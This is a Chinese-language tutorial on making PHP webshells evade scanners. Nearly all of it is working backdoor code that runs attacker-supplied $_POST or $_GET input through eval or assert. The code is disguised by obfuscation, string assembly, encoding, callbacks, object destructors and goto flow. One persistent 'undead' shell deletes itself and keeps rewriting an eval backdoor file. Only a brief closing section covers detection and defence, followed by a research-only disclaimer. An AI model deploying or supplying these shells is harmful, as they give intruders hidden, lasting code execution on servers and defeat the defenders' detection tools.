PHP Webshell免杀技术详解<\/h1>

一、PHP混淆加密技术<\/h2>

1. PHPFuck混淆<\/h3>
PHPFuck是一种极端的PHP混淆技术，使用极少的字符构造可执行代码：<\/p>
<?<\/span>php<\/span> error_reporting<\/span>(0<\/span>);
<\/span><\/span>((([] ^<\/span> []) .<\/span> [][[]] ^<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] .<\/span> [])[([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> []) .<\/span> [][[]] ^<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> []) .<\/span> [][[]] ^<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> []) .<\/span> [][[]] ^<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> []) .<\/span> [][[]] ^<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> []) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]) .<\/span> 
<\/span><\/span>(([] ^<\/span> []) .<\/span> [][[]] ^<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) .<\/span> [][[]] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])] ^<\/span> ([] .<\/span> [])[([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]]) +<\/span> ([] ^<\/span> [[]])]));
<\/span><\/span><\/code><\/pre>二、字符串拼接技术<\/h2>
1. 基本字符串拼接<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$a =<\/span> implode<\/span>(""<\/span>,['p'<\/span>,'h'<\/span>,'p'<\/span>,'i'<\/span>,'n'<\/span>,'f'<\/span>,'o'<\/span>,'('<\/span>,')'<\/span>]); 
<\/span><\/span>assert<\/span>($a);
<\/span><\/span><\/code><\/pre>2. 动态函数名构造<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$a =<\/span> implode<\/span>(""<\/span>,["e"<\/span>,"v"<\/span>,"a"<\/span>,"l"<\/span>,"("<\/span>,"<\/span>$_<\/span>"<\/span>,"P"<\/span>,"O"<\/span>,"S"<\/span>,"T"<\/span>,"["<\/span>,"'"<\/span>,"x"<\/span>,"'"<\/span>,"]"<\/span>,")"<\/span>]);
<\/span><\/span>assert<\/span>($a);
<\/span><\/span><\/code><\/pre>三、字符串替换技术<\/h2>
1. substr函数<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$a =<\/span> substr<\/span>('aa'<\/span>, 1<\/span>) .<\/span> 's'<\/span> .<\/span> 's'<\/span> .<\/span> 'e'<\/span> .<\/span> 'r'<\/span> .<\/span> 't'<\/span>; 
<\/span><\/span>$a($_POST['x'<\/span>]);
<\/span><\/span><\/code><\/pre>2. strtr函数<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$a =<\/span> strtr<\/span>('abcdet'<\/span>, 'bcde'<\/span>, 'sser'<\/span>); 
<\/span><\/span>echo<\/span> $a; \/\/ 降低检测级别
<\/span><\/span><\/span><\/span>$a($_POST['x'<\/span>]);
<\/span><\/span><\/code><\/pre>3. substr_replace函数<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$a =<\/span> substr_replace<\/span>("asaaaa"<\/span>, "sert"<\/span>, 2<\/span>); 
<\/span><\/span>$a($_POST['x'<\/span>]);
<\/span><\/span><\/code><\/pre>四、变量覆盖技术<\/h2>
1. 基本变量覆盖<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$x =<\/span> 'a'<\/span> .<\/span> 's'<\/span> .<\/span> 's'<\/span> .<\/span> 'e'<\/span> .<\/span> 'r'<\/span> .<\/span> 't'<\/span>; 
<\/span><\/span>$b =<\/span> '_'<\/span> .<\/span> 'P'<\/span> .<\/span> 'O'<\/span> .<\/span> 'S'<\/span> .<\/span> 'T'<\/span>; 
<\/span><\/span>$c =<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>b<\/span>; 
<\/span><\/span>$x($c['x'<\/span>]);
<\/span><\/span><\/code><\/pre>2. 结合替换函数<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$x =<\/span> substr<\/span>('aa'<\/span>, 1<\/span>) .<\/span> 's'<\/span> .<\/span> 's'<\/span> .<\/span> 'e'<\/span> .<\/span> 'r'<\/span> .<\/span> 't'<\/span>; 
<\/span><\/span>$b =<\/span> '_'<\/span> .<\/span> 'P'<\/span> .<\/span> 'O'<\/span> .<\/span> 'S'<\/span> .<\/span> 'T'<\/span>; 
<\/span><\/span>$c =<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>b<\/span>; 
<\/span><\/span>$x($c['x'<\/span>]);
<\/span><\/span><\/code><\/pre>五、参数传递技术<\/h2>
1. 动态参数拼接<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$a =<\/span> 'a'<\/span>; 
<\/span><\/span>$b =<\/span> $a .<\/span> $_POST["b"<\/span>]; 
<\/span><\/span>$c =<\/span> $_POST["c"<\/span>]; 
<\/span><\/span>$b($c);
<\/span><\/span><\/code><\/pre>六、编码解码技术<\/h2>
1. base64编码<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$x =<\/span> substr<\/span>('aa'<\/span>, 1<\/span>) .<\/span> 'ssert'<\/span>; 
<\/span><\/span>$a =<\/span> base64_decode<\/span>($_POST['x'<\/span>]); 
<\/span><\/span>$x($a);
<\/span><\/span><\/code><\/pre>2. rot13编码<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$x =<\/span> 'assert'<\/span>; 
<\/span><\/span>$a =<\/span> str_rot13<\/span>($_POST['x'<\/span>]); 
<\/span><\/span>$x($a);
<\/span><\/span><\/code><\/pre>3. 异或运算<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$x =<\/span> ('!'<\/span> ^<\/span> '@'<\/span>) .<\/span> 'ssert'<\/span>; 
<\/span><\/span>$a =<\/span> base64_decode<\/span>($_POST['x'<\/span>]); 
<\/span><\/span>$x($a);
<\/span><\/span><\/code><\/pre>七、回调函数利用<\/h2>
1. array_uintersect_assoc<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>array_uintersect<\/span>(array<\/span>($_POST['x'<\/span>]), array<\/span>(1<\/span>), 'assert'<\/span>);
<\/span><\/span><\/code><\/pre>2. call_user_func<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>call_user_func<\/span>('assert'<\/span>, $_POST['x'<\/span>]);
<\/span><\/span><\/code><\/pre>3. array_map<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$e =<\/span> $_REQUEST['a'<\/span>]; 
<\/span><\/span>$arr =<\/span> array<\/span>($_POST['x'<\/span>],); 
<\/span><\/span>array_map<\/span>($e, $arr);
<\/span><\/span><\/code><\/pre>八、自定义函数技术<\/h2>
1. 多层函数封装<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> out<\/span>($b){ return<\/span> $b; } 
<\/span><\/span>function<\/span> ey<\/span>($a){ 
<\/span><\/span>    $x =<\/span> ('!'<\/span> ^<\/span> '@'<\/span>) .<\/span> 'ssert'<\/span>; 
<\/span><\/span>    return<\/span> $x($a); 
<\/span><\/span>} 
<\/span><\/span>function<\/span> post<\/span>(){ 
<\/span><\/span>    return<\/span> base64_decode<\/span>($_POST['x'<\/span>]); 
<\/span><\/span>} 
<\/span><\/span>function<\/span> run<\/span>(){ 
<\/span><\/span>    return<\/span> out<\/span>(ey<\/span>(out<\/span>(post<\/span>()))); 
<\/span><\/span>} 
<\/span><\/span>run<\/span>();
<\/span><\/span><\/code><\/pre>2. 多种变体<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> out<\/span>($b){ return<\/span> $b; } 
<\/span><\/span>function<\/span> ey<\/span>($a){ 
<\/span><\/span>    $x =<\/span> substr<\/span>('aa'<\/span>, 1<\/span>) .<\/span> 'ssert'<\/span>; 
<\/span><\/span>    return<\/span> $x($a); 
<\/span><\/span>} 
<\/span><\/span>function<\/span> post<\/span>(){ 
<\/span><\/span>    return<\/span> base64_decode<\/span>($_POST['x'<\/span>]); 
<\/span><\/span>} 
<\/span><\/span>function<\/span> run<\/span>(){ 
<\/span><\/span>    return<\/span> out<\/span>(ey<\/span>(out<\/span>(post<\/span>()))); 
<\/span><\/span>} 
<\/span><\/span>run<\/span>();
<\/span><\/span><\/code><\/pre>九、面向对象技术<\/h2>
1. 类与析构函数<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>class<\/span> B<\/span> { 
<\/span><\/span>    public<\/span> function<\/span> __destruct() { 
<\/span><\/span>        $B =<\/span> $_POST['x'<\/span>]; 
<\/span><\/span>        array_uintersect_assoc<\/span>(array<\/span>($B), array<\/span>(1<\/span>), 'assert'<\/span>); 
<\/span><\/span>    } 
<\/span><\/span>} 
<\/span><\/span>$obj =<\/span> new<\/span> B<\/span>();
<\/span><\/span><\/code><\/pre>2. create_function利用<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>class<\/span> B<\/span> { 
<\/span><\/span>    public<\/span> function<\/span> __destruct() { 
<\/span><\/span>        $b =<\/span> $this-><\/span>name<\/span>; 
<\/span><\/span>        $a =<\/span> $_POST['x'<\/span>]; 
<\/span><\/span>        echo<\/span> $b; 
<\/span><\/span>        echo<\/span> $a; 
<\/span><\/span>        $a(''<\/span>, $b); 
<\/span><\/span>    } 
<\/span><\/span>    public<\/span> function<\/span> __construct($name) { 
<\/span><\/span>        $this-><\/span>name<\/span> =<\/span> $name; 
<\/span><\/span>        echo<\/span> $name; 
<\/span><\/span>    } 
<\/span><\/span>} 
<\/span><\/span>$obj =<\/span> new<\/span> B<\/span>($_POST['e'<\/span>]);
<\/span><\/span><\/code><\/pre>十、goto控制流技术<\/h2>
1. goto基本用法<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>goto<\/span> a<\/span>; 
<\/span><\/span>echo<\/span> 'Foo'<\/span>; 
<\/span><\/span>a<\/span>:<\/span> echo<\/span> 'Bar'<\/span>;
<\/span><\/span><\/code><\/pre>2. 结合回调函数<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>header<\/span>("Content-Type: text\/html; charset=utf-8"<\/span>);
<\/span><\/span>ini_set<\/span>('display_errors'<\/span>, 0<\/span>);
<\/span><\/span>error_reporting<\/span>(E_ALL<\/span>);
<\/span><\/span>
<\/span><\/span>function<\/span> safeCall<\/span>($func, $param =<\/span> null<\/span>) {
<\/span><\/span>    if<\/span> (is_callable<\/span>($func)) {
<\/span><\/span>        return<\/span> call_user_func<\/span>($func, $param);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>test4<\/span>:<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>goto<\/span> test1<\/span>;
<\/span><\/span>
<\/span><\/span>test2<\/span>:<\/span>
<\/span><\/span>$m =<\/span> isset<\/span>($_GET['m'<\/span>]) ?<\/span> $_GET['m'<\/span>] :<\/span> null<\/span>;
<\/span><\/span>$o =<\/span> isset<\/span>($_GET['o'<\/span>]) ?<\/span> $_GET['o'<\/span>] :<\/span> null<\/span>;
<\/span><\/span>if<\/span> ($m ===<\/span> null<\/span>) {
<\/span><\/span>    print<\/span>('NO'<\/span>);
<\/span><\/span>} else<\/span> {
<\/span><\/span>    safeCall<\/span>($m, $l);
<\/span><\/span>    safeCall<\/span>($o);
<\/span><\/span>}
<\/span><\/span>goto<\/span> test3<\/span>;
<\/span><\/span>
<\/span><\/span>test1<\/span>:<\/span>
<\/span><\/span>$l =<\/span> isset<\/span>($_GET['x'<\/span>]) ?<\/span> $_GET['x'<\/span>] :<\/span> ''<\/span>;
<\/span><\/span>if<\/span> ($l !==<\/span> ''<\/span>) {
<\/span><\/span>    $l =<\/span> base64_decode<\/span>($l, true<\/span>);
<\/span><\/span>    if<\/span> ($l ===<\/span> false<\/span>) {
<\/span><\/span>        goto<\/span> error<\/span>;
<\/span><\/span>    }
<\/span><\/span>} else<\/span> {
<\/span><\/span>    goto<\/span> error<\/span>;
<\/span><\/span>}
<\/span><\/span>goto<\/span> test2<\/span>;
<\/span><\/span>
<\/span><\/span>test3<\/span>:<\/span>
<\/span><\/span>goto<\/span> test4<\/span>;
<\/span><\/span>
<\/span><\/span>error<\/span>:<\/span>
<\/span><\/span>echo<\/span> 'Error: Invalid input.'<\/span>;
<\/span><\/span>exit<\/span>;
<\/span><\/span><\/code><\/pre>十一、不死马技术<\/h2>
<?<\/span>php<\/span> 
<\/span><\/span>ignore_user_abort<\/span>(true<\/span>);  \/\/ 忽略用户断开连接
<\/span><\/span><\/span><\/span>set_time_limit<\/span>(0<\/span>);        \/\/ 无时间限制
<\/span><\/span><\/span><\/span>unlink<\/span>(__FILE__<\/span>);         \/\/ 删除自身
<\/span><\/span><\/span><\/span>$file =<\/span> 'xxx.php'<\/span>;        \/\/ 后门文件名
<\/span><\/span><\/span><\/span>$code =<\/span> '<?php @eval($_POST[a]);?>'<\/span>; \/\/ 恶意代码
<\/span><\/span><\/span><\/span>
<\/span><\/span>while<\/span>(1<\/span>){                 \/\/ 无限循环
<\/span><\/span><\/span><\/span>    file_put_contents<\/span>($file, $code);
<\/span><\/span>    usleep<\/span>(5000<\/span>);         \/\/ 微秒级延迟
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>十二、总结与防御建议<\/h2>
1. 免杀原理<\/h3>

后门查杀主要依赖正则表达式静态匹配<\/li>
通过变换代码结构和执行方式绕过已有正则规则<\/li>
核心是保持功能不变的前提下改变代码表现形式<\/li>
<\/ul>
2. 防御措施<\/h3>

使用动态分析结合静态分析<\/li>
监控异常的文件操作和进程行为<\/li>
限制危险函数的使用<\/li>
实施严格的输入验证和过滤<\/li>
定期更新安全规则和检测机制<\/li>
<\/ul>
以上技术仅用于安全研究和防御技术研究，请勿用于非法用途。<\/p>